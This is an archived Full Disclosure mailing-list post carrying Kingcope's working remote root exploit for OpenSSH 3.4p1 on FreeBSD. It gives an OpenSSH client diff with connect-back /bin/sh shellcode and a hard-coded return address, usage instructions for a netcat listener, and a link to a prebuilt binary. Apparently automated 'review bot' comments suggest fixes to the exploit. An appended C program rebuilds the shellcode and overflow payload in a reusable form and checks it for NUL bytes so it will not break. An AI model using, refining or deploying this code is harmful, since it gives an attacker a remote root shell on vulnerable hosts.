Full Disclosure mailing list archives
Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)
From: "HI-TECH ." <isowarez.isowarez.isowarez () googlemail com>
Date: Fri, 1 Jul 2011 17:45:22 +0200
OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011

Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924

run like ./ssh -1 -z <yourip> <target>
setup a netcat, port 443 on yourip first

a statically linked linux binary of the exploit can be found below
attached is a diff to openssh-5.8p2.
the statically linked binary can be downloaded from http://isowarez.de/ssh_0day

I know these versions are really old, some seem to run that though.

-Cheers,
King "the archaeologist" Cope

diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c 149a150
char *myip;
195a197,203
"OpenSSH FreeBSD Remote Root Exploit\n" "By Kingcope\n" "Year 2011\n\n" "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n" "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n" "run like ./ssh -1 -z <yourip> <target>\n" "setup a netcat, port 443 on yourip first\n\n"
299c307 < while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx" ---
while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
335a344,346
break; case 'z': myip = optarg;
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c 667a668,719
//IP=\xc0\xa8\x20\x80 #define IPADDR "\xc0\xa8\x20\x80" #define PORT "\x27\x10" /* htons(10000) */ char sc[] = "\x90\x90" "\x90\x90" "\x31\xc9" // xor ecx, ecx "\xf7\xe1" // mul ecx "\x51" // push ecx "\x41" // inc ecx "\x51" // push ecx "\x41" // inc ecx "\x51" // push ecx "\x51" // push ecx "\xb0\x61" // mov al, 97 "\xcd\x80" // int 80h "\x89\xc3" // mov ebx, eax "\x68"IPADDR // push dword 0101017fh "\x66\x68"PORT // push word 4135 "\x66\x51" // push cx "\x89\xe6" // mov esi, esp "\xb2\x10" // mov dl, 16 "\x52" // push edx "\x56" // push esi "\x50" // push eax "\x50" // push eax "\xb0\x62" // mov al, 98 "\xcd\x80" // int 80h "\x41" // inc ecx "\xb0\x5a" // mov al, 90 "\x49" // dec ecx "\x51" // push ecx "\x53" // push ebx "\x53" // push ebx "\xcd\x80" // int 80h "\x41" // inc ecx "\xe2\xf5" // loop -10 "\x51" // push ecx "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh "\x89\xe3" // mov ebx, esp "\x51" // push ecx "\x54" // push esp "\x53" // push ebx "\x53" // push ebx "\xb0\xc4\x34\xff" "\xcd\x80"; // int 80h extern char *myip;
678a731,748
char buffer[100000]; printf("OpenSSH Remote Root Exploit\n"); printf("By Kingcope\n"); printf("Year 2011\n\n"); printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"); printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"); printf("Connect back to: %s:443\n", myip); *((unsigned long*)(sc + 21)) = inet_addr(myip); *((unsigned short*)(sc + 27)) = htons(443); memset(buffer, 'V', 8096); memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 memset(buffer+28, '\x90', 65535); memcpy(buffer+28+65535, sc, sizeof(sc)); server_user=buffer;
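Review bot: in the `335a344,346` hunk (`case 'z': myip = optarg;`) the `-z` value is stored without validation and the `char *myip;` added at `149a150` has no default, so a run without `-z` leaves `myip` NULL and the sshconnect1.c code later hands it to `printf("%s")` and `inet_addr()`. Reject a bad value in the option handler, e.g. `if (inet_addr(optarg) == INADDR_NONE) fatal("bad -z address");`, and refuse to continue when `myip` is still NULL after the getopt loop.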
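Review bot: in the `667a668,719` hunk the comments on the two pushes after `mov ebx, eax` (`push dword 0101017fh`, `push word 4135`) describe the template's original 127.1.1.1:4135 values, not the `IPADDR`/`PORT` defines beside them, and both fields are overwritten at runtime anyway (`sc + 21`, `sc + 27` in the next hunk); either replace the defines with a commented placeholder or fix the comments. The closing `"\xb0\xc4\x34\xff"` (`mov al, 0xc4` / `xor al, 0xff`, leaving 0x3b, the FreeBSD execve number, in al) is the one instruction in the stub with no comment and the one a reader most needs explained.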
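Review bot: in the `678a731,748` hunk only one return address is wired in (`memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4)`, commented as the 20020702 build) while the banner printed in the same hunk advertises both 20020702 and 20030924; if the second build shares the address the comment should say so, otherwise a second offset selected on the server's version string is missing. `inet_addr(myip)` is also used unchecked, so a malformed `-z` value silently patches 0xffffffff into the stub. Minor: `memset(buffer, 'V', 8096)` only matters for bytes 0..23, because everything from offset 28 on is rewritten by the following `memset`/`memcpy`.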
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
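The hunks above hard-code the callback address at `sc + 21` / `sc + 27` and lay the username out as filler, return address, NOP sled and stub. As an added example (my code, not Kingcope's and not part of the post) here is the same layout built in C with the two placeholders located by value instead of by fixed offset, plus the check a practitioner wants before using anything like it: assuming, as the post's `server_user=buffer` line suggests, that the client later sends the buffer as a NUL-terminated string, a NUL byte anywhere in the callback IP, the port or the return address truncates the payload, so a 10.x.x.x listener or port 256 silently breaks the stub. The stub bytes, the 0x080c4b6b address and the 24 / 65535 layout are taken from the post; 192.168.1.7, 10.0.0.5 and port 443 are constructed sample inputs.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>

/* Placeholder IP and port bytes inside the template (values from the post).
 * Both are found by value and replaced, rather than by a hard-coded offset. */
#define IP_MARK   "\xc0\xa8\x20\x80"
#define PORT_MARK "\x27\x10"

/* The FreeBSD connect-back stub as posted: socket, connect, dup2 loop, execve. */
static const char sc_template[] =
    "\x90\x90\x90\x90"
    "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80"   /* socket()  */
    "\x89\xc3"
    "\x68" IP_MARK                                               /* push ip   */
    "\x66\x68" PORT_MARK                                         /* push port */
    "\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80"   /* connect() */
    "\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5"           /* dup2 x3   */
    "\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"       /* "//sh", "/bin" */
    "\x51\x54\x53\x53\xb0\xc4\x34\xff\xcd\x80";                  /* execve()  */
#define SC_LEN (sizeof(sc_template) - 1)   /* 78 bytes, without the literal's NUL */

/* Offset of the first occurrence of mark in buf, or -1 if absent. */
static long find_marker(const unsigned char *buf, size_t n, const char *mark, size_t mlen)
{
    for (size_t i = 0; i + mlen <= n; i++)
        if (memcmp(buf + i, mark, mlen) == 0)
            return (long)i;
    return -1;
}

/* Copy the template into out and patch ip:port into it.
 * Returns the stub length, or 0 if the address is invalid or out is too small. */
size_t build_shellcode(unsigned char *out, size_t outlen, const char *ip, uint16_t port)
{
    struct in_addr a;
    if (outlen < SC_LEN || inet_pton(AF_INET, ip, &a) != 1)
        return 0;
    memcpy(out, sc_template, SC_LEN);
    long ipoff = find_marker(out, SC_LEN, IP_MARK, 4);
    long portoff = find_marker(out, SC_LEN, PORT_MARK, 2);
    if (ipoff < 0 || portoff < 0)
        return 0;
    uint32_t addr = a.s_addr;        /* already in network byte order */
    uint16_t nport = htons(port);
    memcpy(out + ipoff, &addr, 4);
    memcpy(out + portoff, &nport, 2);
    return SC_LEN;
}

/* 1 if the first n bytes contain no NUL; a C-string username stops at the first one. */
int nul_free(const unsigned char *p, size_t n)
{
    return memchr(p, 0, n) == NULL;
}

/* Username layout from the post: filler up to ret_off, little-endian return
 * address, NOP sled, stub, terminating NUL. Returns the payload length before
 * the NUL, or 0 if it does not fit or would be truncated by an embedded NUL. */
size_t build_username(unsigned char *out, size_t outlen, size_t ret_off, uint32_t ret,
                      size_t sled, const unsigned char *sc, size_t sclen)
{
    size_t total = ret_off + 4 + sled + sclen;
    if (total + 1 > outlen)
        return 0;
    memset(out, 'V', ret_off);
    for (int i = 0; i < 4; i++)
        out[ret_off + i] = (unsigned char)(ret >> (8 * i));
    memset(out + ret_off + 4, 0x90, sled);
    memcpy(out + ret_off + 4 + sled, sc, sclen);
    out[total] = 0;
    return nul_free(out, total) ? total : 0;
}

int main(void)
{
    unsigned char sc[SC_LEN], user[70000];
    const char *ips[] = { "192.168.1.7", "10.0.0.5" };   /* constructed samples */
    for (int i = 0; i < 2; i++) {
        size_t n = build_shellcode(sc, sizeof sc, ips[i], 443);
        printf("%s:443 -> %zu bytes, NUL-free: %s\n", ips[i], n,
               (n && nul_free(sc, n)) ? "yes" : "no");
    }
    build_shellcode(sc, sizeof sc, ips[0], 443);
    size_t len = build_username(user, sizeof user, 24, 0x080c4b6bu, 65535, sc, SC_LEN);
    printf("username payload: %zu bytes (0 = unusable)\n", len);
    return 0;
}
```

Build with `cc -Wall -o sshpayload sshpayload.c`; the program only assembles the buffer and never opens a socket. The marker search is what makes the layout survive edits to the stub, and the NUL check is what the original `inet_addr(myip)` line lacks.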
Current thread:
- Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) HI-TECH . (Jul 01)
- Re: Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) Benji (Jul 01)
- Re: Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) HI-TECH . (Jul 01)
- Re: Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) Benji (Jul 01)